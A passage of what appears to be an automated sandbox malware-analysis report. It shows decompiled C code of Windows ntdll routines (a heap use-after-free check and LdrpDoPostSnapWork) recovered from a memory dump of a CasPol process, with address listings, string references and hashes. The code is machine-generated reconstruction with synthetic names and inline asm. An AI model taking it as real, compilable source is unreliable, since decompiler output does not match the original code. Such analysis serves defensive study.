									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E016EA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0167D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0162B150();
													} else {
														E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0162B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1716378 = 1;
														asm("int3");
														 *0x1716378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0164A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0164A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0164BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0164BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                0x016499ca
                                                                0x016499cc
                                                                0x016499df
                                                                0x016499e3
                                                                0x016499f8
                                                                0x016499fb
                                                                0x016499fb
                                                                0x00000000
                                                                0x01649a48
                                                                0x01649a48
                                                                0x01649a4c
                                                                0x01649a51
                                                                0x01649a55
                                                                0x01649a61
                                                                0x01649a66
                                                                0x01649a68
                                                                0x01691457
                                                                0x0169145c
                                                                0x0169145c
                                                                0x01649a68
                                                                0x01649a6e
                                                                0x01649a71
                                                                0x01649a74
                                                                0x01649a76
                                                                0x01691466
                                                                0x01691469
                                                                0x01691469
                                                                0x0169146c
                                                                0x0169146e
                                                                0x01691471
                                                                0x01691474
                                                                0x01691477
                                                                0x01691479
                                                                0x0169159c
                                                                0x0169159c
                                                                0x0169159d
                                                                0x016915a6
                                                                0x016915ab
                                                                0x016915ab
                                                                0x00000000
                                                                0x016915ab
                                                                0x0169147f
                                                                0x01691481
                                                                0x00000000
                                                                0x00000000
                                                                0x0169148a
                                                                0x0169148d
                                                                0x01691493
                                                                0x01691495
                                                                0x016914c0
                                                                0x016914c0
                                                                0x016914c3
                                                                0x016914c6
                                                                0x016914c8
                                                                0x016914cb
                                                                0x016914cf
                                                                0x016914f2
                                                                0x016914f2
                                                                0x016914f5
                                                                0x016914f8
                                                                0x01691501
                                                                0x01691508
                                                                0x0169150b
                                                                0x0169150e
                                                                0x01691510
                                                                0x01691513
                                                                0x01691515
                                                                0x01691515
                                                                0x01691518
                                                                0x01691518
                                                                0x01691513
                                                                0x01691521
                                                                0x01691525
                                                                0x0169152a
                                                                0x0169152d
                                                                0x01691530
                                                                0x01691532
                                                                0x01691539
                                                                0x0169153d
                                                                0x0169155d
                                                                0x01691562
                                                                0x0169153f
                                                                0x01691555
                                                                0x0169155a
                                                                0x01691570
                                                                0x01691577
                                                                0x0169157c
                                                                0x01691582
                                                                0x01691585
                                                                0x01691589
                                                                0x0169158b
                                                                0x01691592
                                                                0x01691593
                                                                0x01691593
                                                                0x01691589
                                                                0x01691530
                                                                0x00000000
                                                                0x016914f8
                                                                0x016914d5
                                                                0x016914da
                                                                0x016914dc
                                                                0x00000000
                                                                0x016914de
                                                                0x016914e8
                                                                0x00000000
                                                                0x016914e8
                                                                0x01691497
                                                                0x01691497
                                                                0x016914a4
                                                                0x016914a4
                                                                0x016914a7
                                                                0x016914a9
                                                                0x016914ab
                                                                0x016914ab
                                                                0x0169149c
                                                                0x0169149e
                                                                0x016914a0
                                                                0x016914b0
                                                                0x016914b0
                                                                0x00000000
                                                                0x016914a2
                                                                0x016914a2
                                                                0x00000000
                                                                0x016914a2
                                                                0x016914a0
                                                                0x016914b3
                                                                0x016914bb
                                                                0x00000000
                                                                0x016914bb
                                                                0x01691495
                                                                0x01649a7c
                                                                0x01649a7c
                                                                0x01649a7f
                                                                0x01649a7f
                                                                0x01649a82
                                                                0x01649a84
                                                                0x01649a87
                                                                0x01649a8a
                                                                0x01649a8d
                                                                0x01649a8f
                                                                0x0169166a
                                                                0x0169166a
                                                                0x0169166b
                                                                0x01691674
                                                                0x00000000
                                                                0x01691674
                                                                0x01649a95
                                                                0x01649a97
                                                                0x00000000
                                                                0x00000000
                                                                0x01649aa0
                                                                0x01649aa3
                                                                0x01649aa9
                                                                0x01649aab
                                                                0x01649ad7
                                                                0x01649ad7
                                                                0x01649ada
                                                                0x01649add
                                                                0x01649adf
                                                                0x01649ae2
                                                                0x01649ae6
                                                                0x01649b22
                                                                0x01649b27
                                                                0x01649b29
                                                                0x00000000
                                                                0x01649b2b
                                                                0x016915be
                                                                0x00000000
                                                                0x016915be
                                                                0x01649b29
                                                                0x01649ae8
                                                                0x01649ae8
                                                                0x01649aeb
                                                                0x01649aee
                                                                0x016915cb
                                                                0x016915d2
                                                                0x016915d5
                                                                0x016915d7
                                                                0x016915da
                                                                0x016915dc
                                                                0x016915dc
                                                                0x016915dc
                                                                0x016915da
                                                                0x016915e5
                                                                0x016915e9
                                                                0x016915ee
                                                                0x016915f1
                                                                0x016915f3
                                                                0x016915f9
                                                                0x01691600
                                                                0x01691604
                                                                0x01691624
                                                                0x01691629
                                                                0x01691606
                                                                0x0169161c
                                                                0x01691621
                                                                0x01691637
                                                                0x0169163e
                                                                0x01691643
                                                                0x01691649
                                                                0x0169164c
                                                                0x01691650
                                                                0x01691656
                                                                0x0169165d
                                                                0x0169165e
                                                                0x0169165e
                                                                0x01691650
                                                                0x016915f3
                                                                0x01649af4
                                                                0x01649af7
                                                                0x01649afc
                                                                0x01649b00
                                                                0x01649b04
                                                                0x01649b08
                                                                0x01649b14
                                                                0x016499fe
                                                                0x01649a04
                                                                0x01649a07
                                                                0x00000000
                                                                0x01649a29
                                                                0x0169169c
                                                                0x016916a0
                                                                0x016916a5
                                                                0x016916a9
                                                                0x016916b5
                                                                0x016916ba
                                                                0x016916bc
                                                                0x016916be
                                                                0x016916c3
                                                                0x016916c3
                                                                0x016916bc
                                                                0x016916c8
                                                                0x016916cc
                                                                0x0169181b
                                                                0x0169181b
                                                                0x0169181e
                                                                0x0169181e
                                                                0x01691821
                                                                0x01691823
                                                                0x01691826
                                                                0x01691829
                                                                0x0169182c
                                                                0x0169182e
                                                                0x01691688
                                                                0x01691688
                                                                0x01691689
                                                                0x0169168b
                                                                0x0169168c
                                                                0x0169168d
                                                                0x0169168f
                                                                0x01691692
                                                                0x00000000
                                                                0x01691692
                                                                0x01691834
                                                                0x01691836
                                                                0x00000000
                                                                0x00000000
                                                                0x0169183f
                                                                0x01691842
                                                                0x01691848
                                                                0x0169184a
                                                                0x01691875
                                                                0x01691875
                                                                0x01691878
                                                                0x0169187b
                                                                0x0169187d
                                                                0x01691880
                                                                0x01691884
                                                                0x016918a7
                                                                0x016918a7
                                                                0x016918aa
                                                                0x016918ad
                                                                0x016918b6
                                                                0x016918bd
                                                                0x016918c0
                                                                0x016918c3
                                                                0x016918c5
                                                                0x016918c8
                                                                0x016918ca
                                                                0x016918ca
                                                                0x016918cd
                                                                0x016918cd
                                                                0x016918c8
                                                                0x016918d5
                                                                0x016918da
                                                                0x016918df
                                                                0x016918e2
                                                                0x016918e5
                                                                0x016918e7
                                                                0x016918ee
                                                                0x016918f2
                                                                0x01691912
                                                                0x01691917
                                                                0x016918f4
                                                                0x0169190a
                                                                0x0169190f
                                                                0x01691925
                                                                0x0169192c
                                                                0x01691931
                                                                0x0169193a
                                                                0x0169193e
                                                                0x01691940
                                                                0x01691947
                                                                0x01691948
                                                                0x01691948
                                                                0x0169193e
                                                                0x016918e5
                                                                0x0169194f
                                                                0x01691952
                                                                0x01691956
                                                                0x0169195d
                                                                0x01691961
                                                                0x0169196d
                                                                0x00000000
                                                                0x0169196d
                                                                0x0169188a
                                                                0x0169188f
                                                                0x01691891
                                                                0x00000000
                                                                0x00000000
                                                                0x0169189d
                                                                0x00000000
                                                                0x0169189d
                                                                0x0169184c
                                                                0x01691859
                                                                0x01691859
                                                                0x0169185c
                                                                0x00000000
                                                                0x00000000
                                                                0x01691851
                                                                0x01691853
                                                                0x01691855
                                                                0x01691865
                                                                0x01691865
                                                                0x01691866
                                                                0x01691868
                                                                0x01691870
                                                                0x00000000
                                                                0x01691870
                                                                0x01691857
                                                                0x01691857
                                                                0x0169185e
                                                                0x00000000
                                                                0x016916d2
                                                                0x016916d2
                                                                0x016916d5
                                                                0x016916d5
                                                                0x016916d8
                                                                0x016916da
                                                                0x016916dd
                                                                0x016916e0
                                                                0x016916e3
                                                                0x016916e5
                                                                0x01691808
                                                                0x01691808
                                                                0x01691809
                                                                0x01691812
                                                                0x01691817
                                                                0x01691817
                                                                0x00000000
                                                                0x01691817
                                                                0x016916eb
                                                                0x016916ed
                                                                0x00000000
                                                                0x00000000
                                                                0x016916f6
                                                                0x016916f9
                                                                0x016916ff
                                                                0x01691701
                                                                0x0169172c
                                                                0x0169172c
                                                                0x0169172f
                                                                0x01691732
                                                                0x01691734
                                                                0x01691737
                                                                0x0169173b
                                                                0x0169175e
                                                                0x0169175e
                                                                0x01691761
                                                                0x01691764
                                                                0x0169176d
                                                                0x01691774
                                                                0x01691777
                                                                0x0169177a
                                                                0x0169177c
                                                                0x0169177f
                                                                0x01691781
                                                                0x01691781
                                                                0x01691784
                                                                0x01691784
                                                                0x0169177f
                                                                0x0169178c
                                                                0x01691791
                                                                0x01691796
                                                                0x01691799
                                                                0x0169179c
                                                                0x0169179e
                                                                0x016917a5
                                                                0x016917a9
                                                                0x016917c9
                                                                0x016917ce
                                                                0x016917ab
                                                                0x016917c1
                                                                0x016917c6
                                                                0x016917dc
                                                                0x016917e3
                                                                0x016917e8
                                                                0x016917ee
                                                                0x016917f1
                                                                0x016917f5
                                                                0x016917f7
                                                                0x016917fe
                                                                0x016917ff
                                                                0x016917ff
                                                                0x016917f5
                                                                0x0169179c
                                                                0x00000000
                                                                0x01691764
                                                                0x01691741
                                                                0x01691746
                                                                0x01691748
                                                                0x00000000
                                                                0x00000000
                                                                0x01691754
                                                                0x00000000
                                                                0x01691754
                                                                0x01691703
                                                                0x01691710
                                                                0x01691710
                                                                0x01691713
                                                                0x00000000
                                                                0x00000000
                                                                0x01691708
                                                                0x0169170a
                                                                0x0169170c
                                                                0x0169171c
                                                                0x0169171c
                                                                0x0169171d
                                                                0x0169171f
                                                                0x01691727
                                                                0x00000000
                                                                0x01691727
                                                                0x0169170e
                                                                0x0169170e
                                                                0x01691715
                                                                0x00000000
                                                                0x01691715
                                                                0x016916cc
                                                                0x01649a45
                                                                0x01649a45
                                                                0x01649a0e
                                                                0x01649a1c
                                                                0x01649a23
                                                                0x0169167e
                                                                0x0169167f
                                                                0x01691681
                                                                0x01691683
                                                                0x01691684
                                                                0x00000000
                                                                0x01691684
                                                                0x00000000
                                                                0x01649aad
                                                                0x01649aad
                                                                0x01649ab0
                                                                0x01649ab3
                                                                0x01649ab3
                                                                0x01649ab6
                                                                0x00000000
                                                                0x00000000
                                                                0x01649ab8
                                                                0x01649aba
                                                                0x01649abc
                                                                0x01649ac8
                                                                0x01649ac8
                                                                0x00000000
                                                                0x01649abe
                                                                0x01649abe
                                                                0x01649ac0
                                                                0x00000000
                                                                0x01649ac0
                                                                0x01649abc
                                                                0x01649ad2
                                                                0x00000000
                                                                0x01649ad2
                                                                0x01649aab

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                • API String ID: 0-3178619729
                                                                • Opcode ID: 1befcb687715da1fee43f63a51106db8a63a7022c7e3cbac19d260acb69e26c6
                                                                • Instruction ID: 424ce0efc8fce39af467f509e2dfc6a38ca5b1867c4f6cf4a4ac87e81f2a50c9
                                                                • Opcode Fuzzy Hash: 1befcb687715da1fee43f63a51106db8a63a7022c7e3cbac19d260acb69e26c6
                                                                • Instruction Fuzzy Hash: 3322F3706002469FEB25CF6DCC94B7ABBB9EF46714F28856DE8468B382D731D881CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01638794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 83%
                                                                			E01638794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0163934A() != 0) {
								_t159 = E016AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1715780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E016A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1715780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0163849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01638999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01638999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1715c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1715c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01642280(_t92, 0x17186cc);
															_t94 = E016F9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E016561A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1715c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01638A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1715c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1715c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0166F380(_t136, 0x1601184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01642280(_t108, 0x17186cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E016561A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E016F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0163FFB0(_t118, _t156, 0x17186cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01669A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                0x01638799
                                                                0x0163879d
                                                                0x016387a1
                                                                0x016387a3
                                                                0x016387a8
                                                                0x016387c3
                                                                0x016387c3
                                                                0x016387c8
                                                                0x016387d1
                                                                0x016387d4
                                                                0x016387d8
                                                                0x016387e5
                                                                0x016387ec
                                                                0x01689bfe
                                                                0x01689c00
                                                                0x01689c02
                                                                0x01689c08
                                                                0x01689c0d
                                                                0x01689c0f
                                                                0x01689c14
                                                                0x01689c2d
                                                                0x01689c32
                                                                0x01689c37
                                                                0x01689c3a
                                                                0x01689c3c
                                                                0x01689c42
                                                                0x01689c42
                                                                0x01689c3c
                                                                0x01689c02
                                                                0x016387da
                                                                0x016387df
                                                                0x016387e3
                                                                0x00000000
                                                                0x00000000
                                                                0x016387e3
                                                                0x016387f2
                                                                0x00000000
                                                                0x016387fb
                                                                0x016387fd
                                                                0x016387fe
                                                                0x0163880e
                                                                0x0163880f
                                                                0x01638810
                                                                0x01638814
                                                                0x0163881a
                                                                0x0163881c
                                                                0x0163881f
                                                                0x01638821
                                                                0x01638822
                                                                0x01638824
                                                                0x01638826
                                                                0x0163882c
                                                                0x0163882e
                                                                0x01689c48
                                                                0x01689c48
                                                                0x01638834
                                                                0x01638834
                                                                0x01638837
                                                                0x00000000
                                                                0x00000000
                                                                0x01638837
                                                                0x0163882e
                                                                0x0163883d
                                                                0x01638840
                                                                0x01638843
                                                                0x01638846
                                                                0x01638849
                                                                0x0163884c
                                                                0x0163884e
                                                                0x01638850
                                                                0x01638852
                                                                0x01638854
                                                                0x01638857
                                                                0x016388b4
                                                                0x016388b6
                                                                0x016388b6
                                                                0x01638859
                                                                0x01638859
                                                                0x01638859
                                                                0x01638861
                                                                0x01638866
                                                                0x0163886a
                                                                0x0163893d
                                                                0x01638941
                                                                0x00000000
                                                                0x01638947
                                                                0x01638947
                                                                0x0163894a
                                                                0x0163894c
                                                                0x00000000
                                                                0x01638952
                                                                0x01638955
                                                                0x0163895a
                                                                0x0163895d
                                                                0x0163895d
                                                                0x0163895f
                                                                0x01638961
                                                                0x01638961
                                                                0x01638968
                                                                0x00000000
                                                                0x00000000
                                                                0x0163896a
                                                                0x0163896b
                                                                0x0163896e
                                                                0x00000000
                                                                0x01638970
                                                                0x01638970
                                                                0x01638970
                                                                0x01638970
                                                                0x01638972
                                                                0x01638972
                                                                0x01638974
                                                                0x00000000
                                                                0x0163897a
                                                                0x0163897a
                                                                0x0163897d
                                                                0x00000000
                                                                0x01638983
                                                                0x01689c65
                                                                0x01689c6d
                                                                0x01689c72
                                                                0x01689c75
                                                                0x01689c75
                                                                0x01689c82
                                                                0x01689c86
                                                                0x01689c87
                                                                0x01689c88
                                                                0x01689c89
                                                                0x01689c8c
                                                                0x01689c90
                                                                0x01689c95
                                                                0x01689c97
                                                                0x01689ca0
                                                                0x01689ca3
                                                                0x01689ca9
                                                                0x01689ca9
                                                                0x00000000
                                                                0x01689ca9
                                                                0x01689ca3
                                                                0x00000000
                                                                0x01689c97
                                                                0x0163897d
                                                                0x00000000
                                                                0x01638974
                                                                0x01638988
                                                                0x01638992
                                                                0x01638996
                                                                0x00000000
                                                                0x01638996
                                                                0x0163894c
                                                                0x00000000
                                                                0x01638870
                                                                0x0163887b
                                                                0x0163887d
                                                                0x0163887f
                                                                0x01638881
                                                                0x01638884
                                                                0x01638884
                                                                0x01638886
                                                                0x01638889
                                                                0x0163888c
                                                                0x0163888e
                                                                0x01638891
                                                                0x01638891
                                                                0x01638898
                                                                0x00000000
                                                                0x00000000
                                                                0x0163889a
                                                                0x0163889b
                                                                0x0163889e
                                                                0x00000000
                                                                0x00000000
                                                                0x016388a0
                                                                0x016388a8
                                                                0x016388b0
                                                                0x016388b2
                                                                0x016388d3
                                                                0x016388d5
                                                                0x00000000
                                                                0x016388d7
                                                                0x016388db
                                                                0x016388dc
                                                                0x016388e0
                                                                0x016388e8
                                                                0x016388ee
                                                                0x016388f0
                                                                0x016388f3
                                                                0x016388fc
                                                                0x01638901
                                                                0x01638906
                                                                0x0163890c
                                                                0x0163890c
                                                                0x0163890f
                                                                0x01638916
                                                                0x01638917
                                                                0x01638918
                                                                0x01638919
                                                                0x0163891a
                                                                0x0163891f
                                                                0x01638921
                                                                0x01689c52
                                                                0x01689c55
                                                                0x01689c5b
                                                                0x01689cac
                                                                0x01689cc0
                                                                0x01689cc0
                                                                0x01689c55
                                                                0x01638927
                                                                0x01638927
                                                                0x0163892f
                                                                0x01638933
                                                                0x00000000
                                                                0x016388f5
                                                                0x016388f5
                                                                0x00000000
                                                                0x016388f7
                                                                0x016388f7
                                                                0x016388fa
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016388fa
                                                                0x016388f5
                                                                0x016388f3
                                                                0x00000000
                                                                0x016388d5
                                                                0x00000000
                                                                0x016388b2
                                                                0x016388c9
                                                                0x00000000
                                                                0x016388c9
                                                                0x0163887f
                                                                0x0163886a
                                                                0x01638857
                                                                0x01638852
                                                                0x016388bf
                                                                0x016388bf
                                                                0x016387aa
                                                                0x016387ad
                                                                0x016387ae
                                                                0x016387b4
                                                                0x016387b5
                                                                0x016387b6
                                                                0x016387b8
                                                                0x016387bd
                                                                0x016387c1
                                                                0x016387f4
                                                                0x016387fa
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016387c1
                                                                0x00000000

                                                                Strings
                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01689C28
                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01689C18
                                                                • LdrpDoPostSnapWork, xrefs: 01689C1E
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                • API String ID: 2994545307-1948996284
                                                                • Opcode ID: 2cf09ecb39b1beda4ec25a1004a501f1d63ad770d5f1e77840f00eacaa747797
                                                                • Instruction ID: 542b62845ac682c51002d892b4db49df887dba626b8e675b289206334d860df1
                                                                • Opcode Fuzzy Hash: 2cf09ecb39b1beda4ec25a1004a501f1d63ad770d5f1e77840f00eacaa747797
                                                                • Instruction Fuzzy Hash: 3491E171A002169FEB29DF5DDC81ABAB7BAFFC4314B55426DE905AB241D730AE01CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165AC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 80%
